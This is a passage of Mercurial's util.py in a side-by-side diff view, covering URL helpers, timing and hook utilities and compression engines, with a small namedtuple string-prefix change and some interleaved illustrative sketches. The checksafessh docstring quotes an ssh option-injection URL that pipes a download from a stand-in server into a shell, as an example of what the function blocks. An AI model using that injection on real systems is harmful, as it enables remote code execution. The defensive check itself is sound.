2940 2940 # a password.
2941 2941 return (s, (None, (s, self.host),
2942 2942 self.user, self.passwd or ''))
2943 2943
2944 2944 def isabs(self):
2945 2945 if self.scheme and self.scheme != 'file':
2946 2946 return True # remote URL
2947 2947 if hasdriveletter(self.path):
2948 2948 return True # absolute for our purposes - can't be joined()
2949 2949 if self.path.startswith(br'\\'):
2950 2950 return True # Windows UNC path
2951 2951 if self.path.startswith('/'):
2952 2952 return True # POSIX-style
2953 2953 return False
2954 2954
2955 2955 def localpath(self):
2956 2956 if self.scheme == 'file' or self.scheme == 'bundle':
2957 2957 path = self.path or '/'
2958 2958 # For Windows, we need to promote hosts containing drive
2959 2959 # letters to paths with drive letters.
2960 2960 if hasdriveletter(self._hostport):
2961 2961 path = self._hostport + '/' + self.path
2962 2962 elif (self.host is not None and self.path
2963 2963 and not hasdriveletter(path)):
2964 2964 path = '/' + path
2965 2965 return path
2966 2966 return self._origpath
2967 2967
2968 2968 def islocal(self):
2969 2969 '''whether localpath will return something that posixfile can open'''
2970 2970 return (not self.scheme or self.scheme == 'file'
2971 2971 or self.scheme == 'bundle')
2972 2972
2973 2973 def hasscheme(path):
2974 2974 return bool(url(path).scheme)
2975 2975
2976 2976 def hasdriveletter(path):
2977 2977 return path and path[1:2] == ':' and path[0:1].isalpha()
2978 2978
2979 2979 def urllocalpath(path):
2980 2980 return url(path, parsequery=False, parsefragment=False).localpath()
2981 2981
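# Illustrative sketch (not part of upstream util.py): expected results of the
# small URL helpers above for a few representative inputs.
def _urlhelpers_example():
    assert hasscheme('http://example.com/repo')
    assert not hasscheme('relative/path')
    assert hasdriveletter('c:/temp')
    # localpath() strips the scheme and returns something posixfile can open.
    assert urllocalpath('file:///tmp/repo') == '/tmp/repo'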
2982 2982 def checksafessh(path):
2983 2983 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2984 2984
2985 2985 This is a sanity check for ssh urls. ssh will parse the first item as
2986 2986 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2987 2987 Let's prevent these potentially exploited urls entirely and warn the
2988 2988 user.
2989 2989
2990 2990 Raises an error.Abort when the url is unsafe.
2991 2991 """
2992 2992 path = urlreq.unquote(path)
2993 2993 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2994 2994 raise error.Abort(_('potentially unsafe url: %r') %
2995 2995 (pycompat.bytestr(path),))
2996 2996
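# Illustrative sketch (not part of upstream util.py): checksafessh() accepts
# ordinary ssh URLs and aborts on hosts that ssh would parse as options.
def _checksafessh_example():
    checksafessh('ssh://host.example.com/repo')          # returns None
    try:
        checksafessh('ssh://-oProxyCommand=payload/repo')
    except error.Abort:
        pass                                             # unsafe URL rejected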
2997 2997 def hidepassword(u):
2998 2998 '''hide user credential in a url string'''
2999 2999 u = url(u)
3000 3000 if u.passwd:
3001 3001 u.passwd = '***'
3002 3002 return bytes(u)
3003 3003
3004 3004 def removeauth(u):
3005 3005 '''remove all authentication information from a url string'''
3006 3006 u = url(u)
3007 3007 u.user = u.passwd = None
3008 3008 return bytes(u)
3009 3009
3010 3010 timecount = unitcountfn(
3011 3011 (1, 1e3, _('%.0f s')),
3012 3012 (100, 1, _('%.1f s')),
3013 3013 (10, 1, _('%.2f s')),
3014 3014 (1, 1, _('%.3f s')),
3015 3015 (100, 0.001, _('%.1f ms')),
3016 3016 (10, 0.001, _('%.2f ms')),
3017 3017 (1, 0.001, _('%.3f ms')),
3018 3018 (100, 0.000001, _('%.1f us')),
3019 3019 (10, 0.000001, _('%.2f us')),
3020 3020 (1, 0.000001, _('%.3f us')),
3021 3021 (100, 0.000000001, _('%.1f ns')),
3022 3022 (10, 0.000000001, _('%.2f ns')),
3023 3023 (1, 0.000000001, _('%.3f ns')),
3024 3024 )
3025 3025
3026 3026 @attr.s
3027 3027 class timedcmstats(object):
3028 3028 """Stats information produced by the timedcm context manager on entering."""
3029 3029
3030 3030 # the starting value of the timer as a float (meaning and resolution are
3031 3031 # platform dependent, see util.timer)
3032 3032 start = attr.ib(default=attr.Factory(lambda: timer()))
3033 3033 # the number of seconds as a floating point value; starts at 0, updated when
3034 3034 # the context is exited.
3035 3035 elapsed = attr.ib(default=0)
3036 3036 # the number of nested timedcm context managers.
3037 3037 level = attr.ib(default=1)
3038 3038
3039 3039 def __bytes__(self):
3040 3040 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3041 3041
3042 3042 __str__ = encoding.strmethod(__bytes__)
3043 3043
3044 3044 @contextlib.contextmanager
3045 3045 def timedcm(whencefmt, *whenceargs):
3046 3046 """A context manager that produces timing information for a given context.
3047 3047
3048 3048 On entering, a timedcmstats instance is produced.
3049 3049
3050 3050 This context manager is reentrant.
3051 3051
3052 3052 """
3053 3053 # track nested context managers
3054 3054 timedcm._nested += 1
3055 3055 timing_stats = timedcmstats(level=timedcm._nested)
3056 3056 try:
3057 3057 with tracing.log(whencefmt, *whenceargs):
3058 3058 yield timing_stats
3059 3059 finally:
3060 3060 timing_stats.elapsed = timer() - timing_stats.start
3061 3061 timedcm._nested -= 1
3062 3062
3063 3063 timedcm._nested = 0
3064 3064
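# Illustrative sketch (not part of upstream util.py): the stats object
# yielded by timedcm() is updated with the elapsed time on exit and can be
# rendered with timecount().
def _timedcm_example():
    with timedcm('example') as stats:
        pass                         # timed work would go here
    return timecount(stats.elapsed)  # e.g. '2.0 us'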
3065 3065 def timed(func):
3066 3066 '''Report the execution time of a function call to stderr.
3067 3067
3068 3068 During development, use as a decorator when you need to measure
3069 3069 the cost of a function, e.g. as follows:
3070 3070
3071 3071 @util.timed
3072 3072 def foo(a, b, c):
3073 3073 pass
3074 3074 '''
3075 3075
3076 3076 def wrapper(*args, **kwargs):
3077 3077 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3078 3078 result = func(*args, **kwargs)
3079 3079 stderr = procutil.stderr
3080 3080 stderr.write('%s%s: %s\n' % (
3081 3081 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3082 3082 time_stats))
3083 3083 return result
3084 3084 return wrapper
3085 3085
3086 3086 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3087 3087 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3088 3088
3089 3089 def sizetoint(s):
3090 3090 '''Convert a size specifier to a byte count.
3091 3091
3092 3092 >>> sizetoint(b'30')
3093 3093 30
3094 3094 >>> sizetoint(b'2.2kb')
3095 3095 2252
3096 3096 >>> sizetoint(b'6M')
3097 3097 6291456
3098 3098 '''
3099 3099 t = s.strip().lower()
3100 3100 try:
3101 3101 for k, u in _sizeunits:
3102 3102 if t.endswith(k):
3103 3103 return int(float(t[:-len(k)]) * u)
3104 3104 return int(t)
3105 3105 except ValueError:
3106 3106 raise error.ParseError(_("couldn't parse size: %s") % s)
3107 3107
3108 3108 class hooks(object):
3109 3109 '''A collection of hook functions that can be used to extend a
3110 3110 function's behavior. Hooks are called in lexicographic order,
3111 3111 based on the names of their sources.'''
3112 3112
3113 3113 def __init__(self):
3114 3114 self._hooks = []
3115 3115
3116 3116 def add(self, source, hook):
3117 3117 self._hooks.append((source, hook))
3118 3118
3119 3119 def __call__(self, *args):
3120 3120 self._hooks.sort(key=lambda x: x[0])
3121 3121 results = []
3122 3122 for source, hook in self._hooks:
3123 3123 results.append(hook(*args))
3124 3124 return results
3125 3125
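# Illustrative sketch (not part of upstream util.py): hooks are invoked in
# lexicographic order of their source names and their results are collected.
def _hooks_example():
    callbacks = hooks()
    callbacks.add('b-source', lambda x: x * 2)
    callbacks.add('a-source', lambda x: x + 1)
    # 'a-source' sorts before 'b-source', so this returns [11, 20].
    return callbacks(10)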
3126 3126 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3127 3127 '''Yields lines for a nicely formatted stacktrace.
3128 3128 Skips the 'skip' last entries, then returns the last 'depth' entries.
3129 3129 Each file+linenumber is formatted according to fileline.
3130 3130 Each line is formatted according to line.
3131 3131 If line is None, it yields:
3132 3132 length of longest filepath+line number,
3133 3133 filepath+linenumber,
3134 3134 function
3135 3135
3136 3136 Not to be used in production code, but very convenient while developing.
3137 3137 '''
3138 3138 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3139 3139 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3140 3140 ][-depth:]
3141 3141 if entries:
3142 3142 fnmax = max(len(entry[0]) for entry in entries)
3143 3143 for fnln, func in entries:
3144 3144 if line is None:
3145 3145 yield (fnmax, fnln, func)
3146 3146 else:
3147 3147 yield line % (fnmax, fnln, func)
3148 3148
3149 3149 def debugstacktrace(msg='stacktrace', skip=0,
3150 3150 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3151 3151 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3152 3152 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3153 3153 By default it will flush stdout first.
3154 3154 It can be used everywhere and intentionally does not require a ui object.
3155 3155 Not to be used in production code, but very convenient while developing.
3156 3156 '''
3157 3157 if otherf:
3158 3158 otherf.flush()
3159 3159 f.write('%s at:\n' % msg.rstrip())
3160 3160 for line in getstackframes(skip + 1, depth=depth):
3161 3161 f.write(line)
3162 3162 f.flush()
3163 3163
3164 3164 class dirs(object):
3165 3165 '''a multiset of directory names from a dirstate or manifest'''
3166 3166
3167 3167 def __init__(self, map, skip=None):
3168 3168 self._dirs = {}
3169 3169 addpath = self.addpath
3170 3170 if safehasattr(map, 'iteritems') and skip is not None:
3171 3171 for f, s in map.iteritems():
3172 3172 if s[0] != skip:
3173 3173 addpath(f)
3174 3174 else:
3175 3175 for f in map:
3176 3176 addpath(f)
3177 3177
3178 3178 def addpath(self, path):
3179 3179 dirs = self._dirs
3180 3180 for base in finddirs(path):
3181 3181 if base in dirs:
3182 3182 dirs[base] += 1
3183 3183 return
3184 3184 dirs[base] = 1
3185 3185
3186 3186 def delpath(self, path):
3187 3187 dirs = self._dirs
3188 3188 for base in finddirs(path):
3189 3189 if dirs[base] > 1:
3190 3190 dirs[base] -= 1
3191 3191 return
3192 3192 del dirs[base]
3193 3193
3194 3194 def __iter__(self):
3195 3195 return iter(self._dirs)
3196 3196
3197 3197 def __contains__(self, d):
3198 3198 return d in self._dirs
3199 3199
3200 3200 if safehasattr(parsers, 'dirs'):
3201 3201 dirs = parsers.dirs
3202 3202
3203 3203 def finddirs(path):
3204 3204 pos = path.rfind('/')
3205 3205 while pos != -1:
3206 3206 yield path[:pos]
3207 3207 pos = path.rfind('/', 0, pos)
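# Illustrative sketch (not part of upstream util.py): finddirs() yields every
# ancestor directory of a slash-separated path, deepest first, and never
# yields the empty root component.
def _finddirs_example():
    assert list(finddirs('a/b/c')) == ['a/b', 'a']
    assert list(finddirs('top-level-file')) == []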
3208 3208
3209 3209 # compression code
3210 3210
3211 3211 SERVERROLE = 'server'
3212 3212 CLIENTROLE = 'client'
3213 3213
3214 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3215 (u'name', u'serverpriority',
3216 u'clientpriority'))
3214 compewireprotosupport = collections.namedtuple(r'compenginewireprotosupport',
3215 (r'name', r'serverpriority',
3216 r'clientpriority'))
3217 3217
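# Illustrative sketch (not part of upstream util.py): namedtuple() requires
# native-string field names on Python 3; the r'' literals above stay native
# strings, which appears to be the point of this change. A hypothetical
# entry mirrors the zlib registration further below:
def _wireprotosupport_example():
    support = compewireprotosupport('zlib', 20, 20)
    # Fields are addressable by name; higher priorities are advertised first.
    return support.name, support.serverpriority, support.clientpriority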
3218 3218 class compressormanager(object):
3219 3219 """Holds registrations of various compression engines.
3220 3220
3221 3221 This class essentially abstracts the differences between compression
3222 3222 engines to allow new compression formats to be added easily, possibly from
3223 3223 extensions.
3224 3224
3225 3225 Compressors are registered against the global instance by calling its
3226 3226 ``register()`` method.
3227 3227 """
3228 3228 def __init__(self):
3229 3229 self._engines = {}
3230 3230 # Bundle spec human name to engine name.
3231 3231 self._bundlenames = {}
3232 3232 # Internal bundle identifier to engine name.
3233 3233 self._bundletypes = {}
3234 3234 # Revlog header to engine name.
3235 3235 self._revlogheaders = {}
3236 3236 # Wire proto identifier to engine name.
3237 3237 self._wiretypes = {}
3238 3238
3239 3239 def __getitem__(self, key):
3240 3240 return self._engines[key]
3241 3241
3242 3242 def __contains__(self, key):
3243 3243 return key in self._engines
3244 3244
3245 3245 def __iter__(self):
3246 3246 return iter(self._engines.keys())
3247 3247
3248 3248 def register(self, engine):
3249 3249 """Register a compression engine with the manager.
3250 3250
3251 3251 The argument must be a ``compressionengine`` instance.
3252 3252 """
3253 3253 if not isinstance(engine, compressionengine):
3254 3254 raise ValueError(_('argument must be a compressionengine'))
3255 3255
3256 3256 name = engine.name()
3257 3257
3258 3258 if name in self._engines:
3259 3259 raise error.Abort(_('compression engine %s already registered') %
3260 3260 name)
3261 3261
3262 3262 bundleinfo = engine.bundletype()
3263 3263 if bundleinfo:
3264 3264 bundlename, bundletype = bundleinfo
3265 3265
3266 3266 if bundlename in self._bundlenames:
3267 3267 raise error.Abort(_('bundle name %s already registered') %
3268 3268 bundlename)
3269 3269 if bundletype in self._bundletypes:
3270 3270 raise error.Abort(_('bundle type %s already registered by %s') %
3271 3271 (bundletype, self._bundletypes[bundletype]))
3272 3272
3273 3273 # Only register an external-facing name if one was declared.
3274 3274 if bundlename:
3275 3275 self._bundlenames[bundlename] = name
3276 3276
3277 3277 self._bundletypes[bundletype] = name
3278 3278
3279 3279 wiresupport = engine.wireprotosupport()
3280 3280 if wiresupport:
3281 3281 wiretype = wiresupport.name
3282 3282 if wiretype in self._wiretypes:
3283 3283 raise error.Abort(_('wire protocol compression %s already '
3284 3284 'registered by %s') %
3285 3285 (wiretype, self._wiretypes[wiretype]))
3286 3286
3287 3287 self._wiretypes[wiretype] = name
3288 3288
3289 3289 revlogheader = engine.revlogheader()
3290 3290 if revlogheader and revlogheader in self._revlogheaders:
3291 3291 raise error.Abort(_('revlog header %s already registered by %s') %
3292 3292 (revlogheader, self._revlogheaders[revlogheader]))
3293 3293
3294 3294 if revlogheader:
3295 3295 self._revlogheaders[revlogheader] = name
3296 3296
3297 3297 self._engines[name] = engine
3298 3298
3299 3299 @property
3300 3300 def supportedbundlenames(self):
3301 3301 return set(self._bundlenames.keys())
3302 3302
3303 3303 @property
3304 3304 def supportedbundletypes(self):
3305 3305 return set(self._bundletypes.keys())
3306 3306
3307 3307 def forbundlename(self, bundlename):
3308 3308 """Obtain a compression engine registered to a bundle name.
3309 3309
3310 3310 Will raise KeyError if the bundle type isn't registered.
3311 3311
3312 3312 Will abort if the engine is known but not available.
3313 3313 """
3314 3314 engine = self._engines[self._bundlenames[bundlename]]
3315 3315 if not engine.available():
3316 3316 raise error.Abort(_('compression engine %s could not be loaded') %
3317 3317 engine.name())
3318 3318 return engine
3319 3319
3320 3320 def forbundletype(self, bundletype):
3321 3321 """Obtain a compression engine registered to a bundle type.
3322 3322
3323 3323 Will raise KeyError if the bundle type isn't registered.
3324 3324
3325 3325 Will abort if the engine is known but not available.
3326 3326 """
3327 3327 engine = self._engines[self._bundletypes[bundletype]]
3328 3328 if not engine.available():
3329 3329 raise error.Abort(_('compression engine %s could not be loaded') %
3330 3330 engine.name())
3331 3331 return engine
3332 3332
3333 3333 def supportedwireengines(self, role, onlyavailable=True):
3334 3334 """Obtain compression engines that support the wire protocol.
3335 3335
3336 3336 Returns a list of engines in prioritized order, most desired first.
3337 3337
3338 3338 If ``onlyavailable`` is set, filter out engines that can't be
3339 3339 loaded.
3340 3340 """
3341 3341 assert role in (SERVERROLE, CLIENTROLE)
3342 3342
3343 3343 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3344 3344
3345 3345 engines = [self._engines[e] for e in self._wiretypes.values()]
3346 3346 if onlyavailable:
3347 3347 engines = [e for e in engines if e.available()]
3348 3348
3349 3349 def getkey(e):
3350 3350 # Sort first by priority, highest first. In case of tie, sort
3351 3351 # alphabetically. This is arbitrary, but ensures output is
3352 3352 # stable.
3353 3353 w = e.wireprotosupport()
3354 3354 return -1 * getattr(w, attr), w.name
3355 3355
3356 3356 return list(sorted(engines, key=getkey))
3357 3357
3358 3358 def forwiretype(self, wiretype):
3359 3359 engine = self._engines[self._wiretypes[wiretype]]
3360 3360 if not engine.available():
3361 3361 raise error.Abort(_('compression engine %s could not be loaded') %
3362 3362 engine.name())
3363 3363 return engine
3364 3364
3365 3365 def forrevlogheader(self, header):
3366 3366 """Obtain a compression engine registered to a revlog header.
3367 3367
3368 3368 Will raise KeyError if the revlog header value isn't registered.
3369 3369 """
3370 3370 return self._engines[self._revlogheaders[header]]
3371 3371
3372 3372 compengines = compressormanager()
3373 3373
3374 3374 class compressionengine(object):
3375 3375 """Base class for compression engines.
3376 3376
3377 3377 Compression engines must implement the interface defined by this class.
3378 3378 """
3379 3379 def name(self):
3380 3380 """Returns the name of the compression engine.
3381 3381
3382 3382 This is the key the engine is registered under.
3383 3383
3384 3384 This method must be implemented.
3385 3385 """
3386 3386 raise NotImplementedError()
3387 3387
3388 3388 def available(self):
3389 3389 """Whether the compression engine is available.
3390 3390
3391 3391 The intent of this method is to allow optional compression engines
3392 3392 that may not be available in all installations (such as engines relying
3393 3393 on C extensions that may not be present).
3394 3394 """
3395 3395 return True
3396 3396
3397 3397 def bundletype(self):
3398 3398 """Describes bundle identifiers for this engine.
3399 3399
3400 3400 If this compression engine isn't supported for bundles, returns None.
3401 3401
3402 3402 If this engine can be used for bundles, returns a 2-tuple of strings of
3403 3403 the user-facing "bundle spec" compression name and an internal
3404 3404 identifier used to denote the compression format within bundles. To
3405 3405 exclude the name from external usage, set the first element to ``None``.
3406 3406
3407 3407 If bundle compression is supported, the class must also implement
3408 3408 ``compressstream`` and ``decompressorreader``.
3409 3409
3410 3410 The docstring of this method is used in the help system to tell users
3411 3411 about this engine.
3412 3412 """
3413 3413 return None
3414 3414
3415 3415 def wireprotosupport(self):
3416 3416 """Declare support for this compression format on the wire protocol.
3417 3417
3418 3418 If this compression engine isn't supported for compressing wire
3419 3419 protocol payloads, returns None.
3420 3420
3421 3421 Otherwise, returns ``compenginewireprotosupport`` with the following
3422 3422 fields:
3423 3423
3424 3424 * String format identifier
3425 3425 * Integer priority for the server
3426 3426 * Integer priority for the client
3427 3427
3428 3428 The integer priorities are used to order the advertisement of format
3429 3429 support by server and client. The highest integer is advertised
3430 3430 first. Integers with non-positive values aren't advertised.
3431 3431
3432 3432 The priority values are somewhat arbitrary and only used for default
3433 3433 ordering. The relative order can be changed via config options.
3434 3434
3435 3435 If wire protocol compression is supported, the class must also implement
3436 3436 ``compressstream`` and ``decompressorreader``.
3437 3437 """
3438 3438 return None
3439 3439
3440 3440 def revlogheader(self):
3441 3441 """Header added to revlog chunks that identifies this engine.
3442 3442
3443 3443 If this engine can be used to compress revlogs, this method should
3444 3444 return the bytes used to identify chunks compressed with this engine.
3445 3445 Else, the method should return ``None`` to indicate it does not
3446 3446 participate in revlog compression.
3447 3447 """
3448 3448 return None
3449 3449
3450 3450 def compressstream(self, it, opts=None):
3451 3451 """Compress an iterator of chunks.
3452 3452
3453 3453 The method receives an iterator (ideally a generator) of chunks of
3454 3454 bytes to be compressed. It returns an iterator (ideally a generator)
3455 3455 of bytes of chunks representing the compressed output.
3456 3456
3457 3457 Optionally accepts an argument defining how to perform compression.
3458 3458 Each engine treats this argument differently.
3459 3459 """
3460 3460 raise NotImplementedError()
3461 3461
3462 3462 def decompressorreader(self, fh):
3463 3463 """Perform decompression on a file object.
3464 3464
3465 3465 Argument is an object with a ``read(size)`` method that returns
3466 3466 compressed data. Return value is an object with a ``read(size)`` that
3467 3467 returns uncompressed data.
3468 3468 """
3469 3469 raise NotImplementedError()
3470 3470
3471 3471 def revlogcompressor(self, opts=None):
3472 3472 """Obtain an object that can be used to compress revlog entries.
3473 3473
3474 3474 The object has a ``compress(data)`` method that compresses binary
3475 3475 data. This method returns compressed binary data or ``None`` if
3476 3476 the data could not be compressed (too small, not compressible, etc).
3477 3477 The returned data should have a header uniquely identifying this
3478 3478 compression format so decompression can be routed to this engine.
3479 3479 This header should be identified by the ``revlogheader()`` return
3480 3480 value.
3481 3481
3482 3482 The object has a ``decompress(data)`` method that decompresses
3483 3483 data. The method will only be called if ``data`` begins with
3484 3484 ``revlogheader()``. The method should return the raw, uncompressed
3485 3485 data or raise a ``StorageError``.
3486 3486
3487 3487 The object is reusable but is not thread safe.
3488 3488 """
3489 3489 raise NotImplementedError()
3490 3490
3491 3491 class _CompressedStreamReader(object):
3492 3492 def __init__(self, fh):
3493 3493 if safehasattr(fh, 'unbufferedread'):
3494 3494 self._reader = fh.unbufferedread
3495 3495 else:
3496 3496 self._reader = fh.read
3497 3497 self._pending = []
3498 3498 self._pos = 0
3499 3499 self._eof = False
3500 3500
3501 3501 def _decompress(self, chunk):
3502 3502 raise NotImplementedError()
3503 3503
3504 3504 def read(self, l):
3505 3505 buf = []
3506 3506 while True:
3507 3507 while self._pending:
3508 3508 if len(self._pending[0]) > l + self._pos:
3509 3509 newbuf = self._pending[0]
3510 3510 buf.append(newbuf[self._pos:self._pos + l])
3511 3511 self._pos += l
3512 3512 return ''.join(buf)
3513 3513
3514 3514 newbuf = self._pending.pop(0)
3515 3515 if self._pos:
3516 3516 buf.append(newbuf[self._pos:])
3517 3517 l -= len(newbuf) - self._pos
3518 3518 else:
3519 3519 buf.append(newbuf)
3520 3520 l -= len(newbuf)
3521 3521 self._pos = 0
3522 3522
3523 3523 if self._eof:
3524 3524 return ''.join(buf)
3525 3525 chunk = self._reader(65536)
3526 3526 self._decompress(chunk)
3527 3527 if not chunk and not self._pending and not self._eof:
3528 3528 # No progress and no new data, bail out
3529 3529 return ''.join(buf)
3530 3530
3531 3531 class _GzipCompressedStreamReader(_CompressedStreamReader):
3532 3532 def __init__(self, fh):
3533 3533 super(_GzipCompressedStreamReader, self).__init__(fh)
3534 3534 self._decompobj = zlib.decompressobj()
3535 3535 def _decompress(self, chunk):
3536 3536 newbuf = self._decompobj.decompress(chunk)
3537 3537 if newbuf:
3538 3538 self._pending.append(newbuf)
3539 3539 d = self._decompobj.copy()
3540 3540 try:
3541 3541 d.decompress('x')
3542 3542 d.flush()
3543 3543 if d.unused_data == 'x':
3544 3544 self._eof = True
3545 3545 except zlib.error:
3546 3546 pass
3547 3547
3548 3548 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3549 3549 def __init__(self, fh):
3550 3550 super(_BZ2CompressedStreamReader, self).__init__(fh)
3551 3551 self._decompobj = bz2.BZ2Decompressor()
3552 3552 def _decompress(self, chunk):
3553 3553 newbuf = self._decompobj.decompress(chunk)
3554 3554 if newbuf:
3555 3555 self._pending.append(newbuf)
3556 3556 try:
3557 3557 while True:
3558 3558 newbuf = self._decompobj.decompress('')
3559 3559 if newbuf:
3560 3560 self._pending.append(newbuf)
3561 3561 else:
3562 3562 break
3563 3563 except EOFError:
3564 3564 self._eof = True
3565 3565
3566 3566 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3567 3567 def __init__(self, fh):
3568 3568 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3569 3569 newbuf = self._decompobj.decompress('BZ')
3570 3570 if newbuf:
3571 3571 self._pending.append(newbuf)
3572 3572
3573 3573 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3574 3574 def __init__(self, fh, zstd):
3575 3575 super(_ZstdCompressedStreamReader, self).__init__(fh)
3576 3576 self._zstd = zstd
3577 3577 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3578 3578 def _decompress(self, chunk):
3579 3579 newbuf = self._decompobj.decompress(chunk)
3580 3580 if newbuf:
3581 3581 self._pending.append(newbuf)
3582 3582 try:
3583 3583 while True:
3584 3584 newbuf = self._decompobj.decompress('')
3585 3585 if newbuf:
3586 3586 self._pending.append(newbuf)
3587 3587 else:
3588 3588 break
3589 3589 except self._zstd.ZstdError:
3590 3590 self._eof = True
3591 3591
3592 3592 class _zlibengine(compressionengine):
3593 3593 def name(self):
3594 3594 return 'zlib'
3595 3595
3596 3596 def bundletype(self):
3597 3597 """zlib compression using the DEFLATE algorithm.
3598 3598
3599 3599 All Mercurial clients should support this format. The compression
3600 3600 algorithm strikes a reasonable balance between compression ratio
3601 3601 and size.
3602 3602 """
3603 3603 return 'gzip', 'GZ'
3604 3604
3605 3605 def wireprotosupport(self):
3606 3606 return compewireprotosupport('zlib', 20, 20)
3607 3607
3608 3608 def revlogheader(self):
3609 3609 return 'x'
3610 3610
3611 3611 def compressstream(self, it, opts=None):
3612 3612 opts = opts or {}
3613 3613
3614 3614 z = zlib.compressobj(opts.get('level', -1))
3615 3615 for chunk in it:
3616 3616 data = z.compress(chunk)
3617 3617 # Not all calls to compress emit data. It is cheaper to inspect
3618 3618 # here than to feed empty chunks through generator.
3619 3619 if data:
3620 3620 yield data
3621 3621
3622 3622 yield z.flush()
3623 3623
3624 3624 def decompressorreader(self, fh):
3625 3625 return _GzipCompressedStreamReader(fh)
3626 3626
3627 3627 class zlibrevlogcompressor(object):
3628 3628 def compress(self, data):
3629 3629 insize = len(data)
3630 3630 # Caller handles empty input case.
3631 3631 assert insize > 0
3632 3632
3633 3633 if insize < 44:
3634 3634 return None
3635 3635
3636 3636 elif insize <= 1000000:
3637 3637 compressed = zlib.compress(data)
3638 3638 if len(compressed) < insize:
3639 3639 return compressed
3640 3640 return None
3641 3641
3642 3642 # zlib makes an internal copy of the input buffer, doubling
3643 3643 # memory usage for large inputs. So do streaming compression
3644 3644 # on large inputs.
3645 3645 else:
3646 3646 z = zlib.compressobj()
3647 3647 parts = []
3648 3648 pos = 0
3649 3649 while pos < insize:
3650 3650 pos2 = pos + 2**20
3651 3651 parts.append(z.compress(data[pos:pos2]))
3652 3652 pos = pos2
3653 3653 parts.append(z.flush())
3654 3654
3655 3655 if sum(map(len, parts)) < insize:
3656 3656 return ''.join(parts)
3657 3657 return None
3658 3658
3659 3659 def decompress(self, data):
3660 3660 try:
3661 3661 return zlib.decompress(data)
3662 3662 except zlib.error as e:
3663 3663 raise error.StorageError(_('revlog decompress error: %s') %
3664 3664 stringutil.forcebytestr(e))
3665 3665
3666 3666 def revlogcompressor(self, opts=None):
3667 3667 return self.zlibrevlogcompressor()
3668 3668
3669 3669 compengines.register(_zlibengine())
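# Illustrative sketch (not part of upstream util.py): round-tripping a payload
# through the registered zlib engine's streaming interfaces. io.BytesIO stands
# in for the file-like object decompressorreader() normally receives.
def _zlib_roundtrip_example(data=b'x' * 4096):
    from io import BytesIO
    engine = compengines['zlib']
    compressed = b''.join(engine.compressstream([data]))
    reader = engine.decompressorreader(BytesIO(compressed))
    return reader.read(len(data)) == data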
3670 3670
3671 3671 class _bz2engine(compressionengine):
3672 3672 def name(self):
3673 3673 return 'bz2'
3674 3674
3675 3675 def bundletype(self):
3676 3676 """An algorithm that produces smaller bundles than ``gzip``.
3677 3677
3678 3678 All Mercurial clients should support this format.
3679 3679
3680 3680 This engine will likely produce smaller bundles than ``gzip`` but
3681 3681 will be significantly slower, both during compression and
3682 3682 decompression.
3683 3683
3684 3684 If available, the ``zstd`` engine can yield similar or better
3685 3685 compression at much higher speeds.
3686 3686 """
3687 3687 return 'bzip2', 'BZ'
3688 3688
3689 3689 # We declare a protocol name but don't advertise by default because
3690 3690 # it is slow.
3691 3691 def wireprotosupport(self):
3692 3692 return compewireprotosupport('bzip2', 0, 0)
3693 3693
3694 3694 def compressstream(self, it, opts=None):
3695 3695 opts = opts or {}
3696 3696 z = bz2.BZ2Compressor(opts.get('level', 9))
3697 3697 for chunk in it:
3698 3698 data = z.compress(chunk)
3699 3699 if data:
3700 3700 yield data
3701 3701
3702 3702 yield z.flush()
3703 3703
3704 3704 def decompressorreader(self, fh):
3705 3705 return _BZ2CompressedStreamReader(fh)
3706 3706
3707 3707 compengines.register(_bz2engine())
3708 3708
3709 3709 class _truncatedbz2engine(compressionengine):
3710 3710 def name(self):
3711 3711 return 'bz2truncated'
3712 3712
3713 3713 def bundletype(self):
3714 3714 return None, '_truncatedBZ'
3715 3715
3716 3716 # We don't implement compressstream because it is hackily handled elsewhere.
3717 3717
3718 3718 def decompressorreader(self, fh):
3719 3719 return _TruncatedBZ2CompressedStreamReader(fh)
3720 3720
3721 3721 compengines.register(_truncatedbz2engine())
3722 3722
3723 3723 class _noopengine(compressionengine):
3724 3724 def name(self):
3725 3725 return 'none'
3726 3726
3727 3727 def bundletype(self):
3728 3728 """No compression is performed.
3729 3729
3730 3730 Use this compression engine to explicitly disable compression.
3731 3731 """
3732 3732 return 'none', 'UN'
3733 3733
3734 3734 # Clients always support uncompressed payloads. Servers don't because
3735 3735 # unless you are on a fast network, uncompressed payloads can easily
3736 3736 # saturate your network pipe.
3737 3737 def wireprotosupport(self):
3738 3738 return compewireprotosupport('none', 0, 10)
3739 3739
3740 3740 # We don't implement revlogheader because it is handled specially
3741 3741 # in the revlog class.
3742 3742
3743 3743 def compressstream(self, it, opts=None):
3744 3744 return it
3745 3745
3746 3746 def decompressorreader(self, fh):
3747 3747 return fh
3748 3748
3749 3749 class nooprevlogcompressor(object):
3750 3750 def compress(self, data):
3751 3751 return None
3752 3752
3753 3753 def revlogcompressor(self, opts=None):
3754 3754 return self.nooprevlogcompressor()
3755 3755
3756 3756 compengines.register(_noopengine())
3757 3757
3758 3758 class _zstdengine(compressionengine):
3759 3759 def name(self):
3760 3760 return 'zstd'
3761 3761
3762 3762 @propertycache
3763 3763 def _module(self):
3764 3764 # Not all installs have the zstd module available. So defer importing
3765 3765 # until first access.
3766 3766 try:
3767 3767 from . import zstd
3768 3768 # Force delayed import.
3769 3769 zstd.__version__
3770 3770 return zstd
3771 3771 except ImportError:
3772 3772 return None
3773 3773
